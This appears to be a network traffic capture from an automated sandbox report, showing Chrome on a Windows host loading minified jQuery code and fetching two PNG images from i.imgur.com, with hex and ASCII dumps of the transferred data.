a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+K+"((?:-\\d)?\\d)"+K+"\$\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	199.232.192.193	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:02 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:02 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2510639 Date: Mon, 24 Mar 2025 09:13:02 GMT X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21965-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 0 X-Timer: S1742807583.750375,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-24 09:13:02 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	199.232.192.193	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:02 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:02 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2559655 Date: Mon, 24 Mar 2025 09:13:02 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21965-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 0 X-Timer: S1742807583.756916,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
